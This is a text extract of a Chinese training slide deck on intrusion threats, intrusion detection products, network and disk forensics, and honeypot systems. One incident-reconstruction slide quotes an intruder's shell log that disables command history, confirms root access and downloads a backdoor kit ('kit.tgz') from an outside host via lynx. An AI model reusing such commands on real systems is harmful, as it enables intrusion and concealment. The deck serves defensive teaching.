黑客入侵常用方法与防范措施PPT学习课件.ppt

,单击此处编辑母版标题样式,中科院高能所,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,黑客入侵防范技术综述,许榕生,中科院高能物理所计算中心,研究员,国家计算机网络入侵防范中心 首席科学家,010-88257981,xurs,中科院高能所,Global Opportunities,622,Mbps,+10,Gbps,l,中科院高能所,基于,Motorola DragonBall,系列的处理器,68,k,核心：,DragonBall 68328、EZ、VZ、Super VZARM,核心：,DragonBall MX1,中科院高能所,网络存在的安全威胁,网络,内部、外部泄密,拒绝服务攻击,逻辑炸弹,特洛伊木马,黑客攻击,计算机病毒,信息丢失、篡改、销毁,后门、隐蔽通道,蠕虫,中科院高能所,黒客攻击技术,入侵系统类攻击,信息窃听,Sniffer,口令攻击,John,漏洞攻击,WIN/IIS、RPC,缓冲区溢出攻击 获取,ROOT,口令,欺骗类攻击,拒绝服务攻击,DDOS,拒绝服务攻击,分布式拒绝服务攻击,对防火墙等安全设备的攻击,利用病毒攻击,木马程序攻击,后门攻击,中科院高能所,网络安全防范体系图,Internet,路由器,管理,平台,安全监控设备,防火墙,IDS,防病毒,服务器,内部网,备份,系统,网络隐患,扫描系统,陷阱机,取证,系统,其它智能系统,中科院高能所,广域网的基本概念,广域网组成：结点交换机+链路结点交换机执行分组存储转发的功能；一个结点交换机可连接多个信道。,距离：广域网相隔几十或几百公里甚至几千公里。,中科院高能所,提供的两类服务,中科院高能所,网络隐患扫描,HP-UX,Sco,Solaris,NT,服务器,Web,服务器,NT,安全管理员,评估、,服务检查、,攻击性测试、,提交安全建议报告,等功能,中科院高能所,网络隐患扫描硬件产品化,iTOP Net-Scanner,中科院高能所,网络入侵检测系统,IDS,HP-UX,Sco,Solaris,NT,服务器,Web,服务器,NT,实时发现、,发布警报、,与防火墙,联动等功能,中科院高能所,分布式,IDS,架构,中科院高能所,产品图,中科院高能所,中科院高能所,中科院高能所,NIDS,产品技术(一),降低误报率与漏报率,基于应用会话的分析检测技术,高级模式匹配,无阻塞处理,实时响应技术,提供多种响应方式,响应过滤技术,防火墙互动开放接口-,OpenNIDS,中科院高能所,NIDS,产品技术,(二),系统自身保护,无,IP,抓包,响应过滤,模块化,多重监控,应用部署,支持双向连接及加密认证,引擎串接部署,中科院高能所,参考对比表格,项目,产品,引擎平台,检测项目,双向,连接,防范,STICK,警报,过滤,无,IP,抓包,响应,方法,RealSecure,NT,Solaris,500600,不支持,不支持,支持,支持,R,V,L,M,O,S,eTrust,NT,300,不支持,支持,不支持,支持,R,V,L,MO,S,NISDetector,Linux,300,不支持,不支持,不支持,支持,R,V,L,天阗,Linux,？,不支持,？,不支持,支持,R,V,L,M,T,天眼,Linux,850,支持,支持,TCP,数据攻击,警报过滤,支持,支持,R,V,L,M,T,S,O,G,中科院高能所,NIDS,技术体系结构,网络入侵检测系统示意图,中科院高能所,简单网络环境,中科院高能所,复杂网络环境,中科院高能所,安全产品的性能问题,规则集,膨胀,产品性能,降低,流量增加,中科院高能所,网络入侵监控系统,IMS,HP-UX,Sco,Solaris,NT,服务器,Web,服务器,NT,指定,IP、,实时发现、,制止阻断,中科院高能所,IP,包的格式,中科院高能所,普通用户,普通用户,HUB/SWITCH,普通用户,普通用户,HUB/SWITCH,HUB,路由器/网关,监控系统,Internet,中科院高能所,中科院高能所,中科院高能所,中科院高能所,中科院高能所,中科院高能所,中科院高能所,网络入侵取证系统,nIFS,识别,保存,分析,提交,中科院高能所,国际计算机网络安全技术交流,FIRST,年会介绍,FIRST,（Forum of Incident Response and Security Teams）,计算机网络事件响应和安全组织论坛。旨在,联络,全世界的网络安全组织以及专家，针对日益严重的网络安全课题采取技术及管理对策的高级研讨会。,该会议已在世界各地召开过，其中包括：法国的图卢兹、美国的芝加哥、澳大利亚的布里斯班、墨西哥的蒙特雷、英国的布鲁斯托尔以及美国加州的克拉拉。,每届都有来自30多个不同国家的大致300多位参加者，我国代表近几年参加会议,。,中科院高能所,近年,FIRST,年会讨论的热点内容主要集中几个方面,：,1.取证方面：相关的技术报告有：,1）Forensic Discovery（,取证的发现）；,2）,文件系统的内部结构调查导引；,3）,Windows XP,客户端的取证功能；,4）计算机取证在网络入侵调查中的重要作用；,5）计算机取证协议与步骤的标准化；,6）Pdd:,手持式操作系统设备的存储映像与,取证分析。,中科院高能所,近年,FIRST,年会讨论的热点内容主要集中几个方面,：,2.传统安全防护技术和手段的报告，如：,1）使用个人防火墙加固安全防范；,2）使用,Ethereal,实现入侵检测；,3）电子商务的安全：保护,Web,应用；,4）ESA,网络安全策略的设计、处理及其实现；,5）,NASIRC,公告板实现方法和,PKI；,6）UDP,扫描的问题；,7）一种防止绕过,NIDS,的适应规则评估算法（,ARE）；,8）识别路由器配置中的安全漏洞；,中科院高能所,近年,FIRST,年会讨论的热点内容主要集中几个方面,：,3.事件或具体攻击的分析研究报告,：,一个全球性,Internet,蠕虫事件的调查；,911事件的相关情况报告；,DoS,攻击数据流量的分析；,SYNDEF:,战胜,DoS/DDoS SYN,洪水攻击的一种方法。,4.与法律相关的报告：,CERTs,新的合法性问题讨论；,CSIRT,培训：合法性问题；,版权侵范问题-未来十年事件响应的最大挑战；,5.标准方面的报告：,CVE,的研究进展报告；,中科院高能所,传统防范工具的局限,防火墙用于网络隔离与过滤，仅类似于门岗。,大多数入侵检测系统（,IDS）,依赖于网络数据的片断，从法律的角度来看证据不够完整；但可以将,IDS,看作盗贼警报。,=网络取证,设备如视频相机用来捕获盗贼的行 踪记录证据，通过分析报告或者提交法庭、或者提供加强防卫的具体措施。,中科院高能所,入侵取证,38,取证(,Forensic),针对计算机入侵与犯罪进行证据获取、保存、分析和出示的科学与技术。,证据的分析可以看作是对受侵计算机系统进行详细的解剖过程，对入侵的事件过程进行重建。,所提供的计算机证据与分析必须能够给法庭呈堂供证。,中科院高能所,取证科学,取证技术的有效性和可靠性以及取证专家基于科学分析的结果所得出的报告将作为法庭判决至关重要的依据。,整个取证过程中需要遵照操作规程和协议以确保证据进行过正确的分析并保证自始至终没有被篡改过。,中科院高能所,入侵取证技术动态,1995年的一项美国,Secret Service,调查报告指出，,70,的法律部门拥有自己的计算机取证实验室，美国国防部至少在六年前就存在计算机取证实验室(,CFLab)，,近年来披露出丰富的实用工具与产品。,中国至今还,缺乏入侵取证方面专门有效的产品,。,中科院高能所,21世纪的网络安全管理与取证技术,13届,FIRST,年会报告,Forensic（,取证）的定义,计算机犯罪斗争中的体系结构、,IDS,和取证技术,一种新的取证范例,案例研究,-,IIS,漏洞（,2001年中美黑客大战,）,2002年安然事件,Guardent,公司,中科院高能所,入侵取证模型,技,术,标,准,类,法律基准,证据的法律和法规,技术基准,分 析 策 略,技术解决方案,法,律,标,准,类,中科院高能所,（一）网络入侵取证,44,网络取证的设计与有关步骤,从网络取证的定义来看，需要进行的四个步骤是：,识别,保存,分析,提交,中科院高能所,网络取证分析过程,系统信息,分析模块,网络数据,分析模块,相关性,分析模块,分,析,结,果,报,表,审计数据,分析子模块,系统日志,分析子模块,入侵,分析子模块,还原,分析子模块,统计,分析子模块,取,证,机,记,录,系统信息,网络数据,中科院高能所,事件分析案例,按照时间顺序重建事件（2001年）,12/02 12:04-13:23,attacker.org,使用,ping floods,攻击,（flows）,12/03 10:57-11:23 attacker.org,缓慢扫描,（flows）,12/02 11:24 attacker.org telnet,到,（flows）,12/03 11:24 ,显示4个失败登录（,syslog）,12/03 11:24 attacker.org,成功登录到,romig,12/03 11:24-12:23 roming,帐号运行,exploit,脚本，该脚本调用了,ls、ps、rm。,中科院高能所,事件分析案例,USER ftp,331 Guest login ok,send your complete e-mail address as password.,PASS mozilla,unset HISTFILE;id;uname-a;,uid=0(root)gid=0(root)groups=50(ftp),whereis lynx,lynx:/usr/bin/lynx/etc/lynx.cfg,/usr/share/man/man1/lynx.1.gz,TERM=linux“,lynx james84.supereva.it/.1/kit.tgz,中科院高能所,事件分析案例（续）,入侵来源：,62.16.35.10,（欧洲）,简单描述：,利用被取证机提供的,FTP,匿名服务，造成缓冲区溢出，入侵者已获得,root,权限。,开始时间：,03/16/2002-10:44:22,结束时间：,03/16/2002-11:08:33,详细过程：,10:44,用户,FTP,匿名登录，并用,mozilla,作为密码，向被取证机发送缓冲区溢出程序，并成功攻入获得了,root,权限。,10:53,开始用,lynx,从网站,james84.supereva.it/.1/kit.tgz,下载程序。,11:08,下载完毕。在被取证机上安装了后门。,中科院高能所,（二）计算机取证,50,文件被删除后,典型的,Unix,和,linux,文件系统：,ffs*,ext2fs*,等,当文件被删除时何种信息被破坏，何种信息被保留,获取被删除文件信息的技巧和工具,中科院高能所,UNIX/Linux,文件系统,directory/home/you,foo 123,bar 456,and so on,inode 123,owner/group ID,mactimes,reference count,file/directory/etc,data block#s,access perms,file size,data blocks,data block,data block,data block,中科院高能所,直接和间接数据块,inode,block 0,block 11,1,indirect,2,indirect,3,indirect,block 12,blk 2059,1,indirect,1,indirect,2,indirect,2,indirect,blk 2060,4196363,1,indirect,1,indirect,Specific block number are typical for Berkeley FFS-like systems,中科院高能所,典型的,UNIX/Linux,磁盘布局,label /swap /usr partition /home partition,zone zone zone zone zone,super inode data inode data,block bitmap bitmap blocks blocks,-,Entire disk-,UNIX/Linux file system,File system zone,如果可能的话，文件的所有数据会放在同一区域内,中科院高能所,文件被删除后保留的信息,directory/home/you,Foo,123,bar 456,and so on,inode 123,owner/group ID,mactimes*,reference count*,file/directory/etc,data block#s,access perms,file size,data blocks,data block,data block,data block,=,UNIX+LINUX,=,LINUX only,*,zero references,*,status change time=time of deletion,中科院高能所,被删除文件信息能存活很长时间,现代操作系统避免了文件的分片,现代操作系统将同一文件的所有信息存放在一个磁盘区域,现代操作系统将相关的文件放在同一磁盘区域（比如，文件放在同一目录下）,所有这些有利于操作和恢复,好处：一个磁盘区域中的活动不会影响另一磁盘区域中的内容,中科院高能所,获取被删除文件信息的工具,Coroners toolkit utilities（TCT):,通过,inode,获取文件的属性:,ils/dev/hda8,30199,通过,inode,获取文件内容:,icat/dev/hda8,30199,获取(未分配的)数据块:,unrm/dev/hda8,TCTutils utilities(Brian Carrier),列出（未分配的）目录项：,fls/dev/hda8,其他,这些工具同样也能在文件被删除前使用。,中科院高能所,计算机取证,WINDOWS,2000/XP,平台,58,NTFS,文件系统磁盘结构,NTFS,中元数据特征,Windows 2000/xp,的日志文件,Windows 2000/xp,的注册表,Windows 2000/xp,系统的一些应用文件文件格式,一些应用程序的缓冲文件,一个取证系统的构想,中科院高能所,NTFS,文件系统特性,作为世界上第一种同时成功的应用在企业级和家用两个领域的文件系统，,NTFS,文件系统具有以下,3个特性,：,可恢复性,安全性,数据冗余和容错,中科院高能所,NTFS,文件磁盘结构,NTFS,以,卷为基础,的文件系统。,它以簇为磁盘空间分配和回收的基本单位，,NTFS,的存储空间以簇为单位进行划分和管理。,在,NTFS,文件系统中，簇的大小称为卷因子。,中科院高能所,NTFS,中的元数据,在,NTFS,中，所有的数据（包括元数据）都,存储在文件,中,元数据：用于文件定位和恢复的数据结构、引导程序结构以及记录整个卷的分配状态的位图等,最重要的元数据文件是,MFT（Master File Table,主控文件表,），它包含,NTFS,卷中所有文件的信息,中科院高能所,有用的功能,这一部分可以用于取证和反删除的主要有,$,mft、$logfile、$bitmap,中科院高能所,几个恢复工具,Recover4all Scavenger,2000/xp,中的系统日志文件,安全日志文件：%,systemroot%system32configSecEvent.EVT,系统日志文件：%,systemroot%system32configSysEvent.EVT,应用程序日志文件：%,systemroot%system32configAppEvent.EVT,Internet,信息服务,FTP,日志默认位置：%,systemroot%system32logfilesmsftpsvc1，,默认每天一个日志,Internet,信息服务,WWW,日志默认位置：%,systemroot%system32logfilesw3svc1，,默认每天一个日志,中科院高能所,用户日志文件,用户日志文件保存在根目录,“,Documents and Settings”,下用户名的目录中，包括3个文件：,NTUSER.DAT,NTUSER.INI,ntuser.dat.LOG,中科院高能所,注册表,c:windowssystem32configsystem c:windowssystem32configsoftwarec:windowssystem32configsamc:windowssystem32configsecurity c:windowssystem32configdefault,中科院高能所,一些应用文件格式,如,word,、,wps,、,outlook,收信箱、,foxmail,信箱、,qq,的聊天纪录等,中科院高能所,典型,foxmail,邮件箱格式,中科院高能所,一些应用程序缓冲,IE,浏览器的上网缓冲,c:Documents and Settings,用户目录,Local SettingsTemporary Internet Files,系统最近的文档,c:Documents and Settings,用户目录,recent,Office,最近的文档,c:Documents and Settings,用户目录,Local SettingsApplication Datamicrosoftofficerecent,中科院高能所,一个取证系统的框架,中科院高能所,中科院高能所,掌上操作系统设备的记忆成像,Joe Grand,11:45am-12:30pm,June 26,2002-7-31,14,th,Annual FIRST Computer Security Incident,Handing Conference,中科院高能所,网络入侵陷阱技术,ITS,73,陷阱机系统,系统内核,陷阱机内核套,陷阱机设置和日志,陷阱,Email,陷阱,Web,陷阱,FTP,陷阱,DNS,中科院高能所,网络陷阱机,陷阱机是一个使用网络重定向技术创建的欺骗主机。在这台计算机上，可建立多个操作系统伪装环境，称做陷阱。,根据网络诱骗的需要，内部陷阱可以被伪装成各种操作系统。这些操作系统分别对应需要保护的各台服务器，如邮件服务器、网站服务器、域名服务器等。,IP IP,IP,IP,IP IP,IPIP,IP IP,IP IP,IP IP ip ip,ip,ip,ip ip,中科院高能所,网络入侵诱骗,在实际应用中，一些典型的专项服务通常位于防火墙的,DMZ,区，如,Web,、,FTP,、,Mail,、,Telnet,、,DNS,服务等。通过,IDS、,防火墙的重定向，智能地连接到一个有相同服务的陷阱机上。,例如，一个通过,FTP,的连接企图可能是一个攻击的刺探。通过重定向功能，使其连接到一个陷阱机上，通过监视，能看到攻击者在做些什么。,中科院高能所,网络陷阱系统的典型应用环境,陷阱主机,Internet,IDS,探测器2,交换机,一个陷阱主机可虚拟四个陷阱机，每个陷阱机都有独立的,IP,地址和独立的服务功能,陷阱机,控制台,陷阱机1,陷阱机2,陷阱机3,陷阱机4,陷阱机,日志服务器,服务器1,服务器2,服务器3,服务器4,防火墙,IDS,内部网,被保护,服务器群,陷阱,主机,DMZ,区,中科院高能所,流量发生器,一个重要的网络性能研究工具,IXIA,网络流量模拟发生器,78,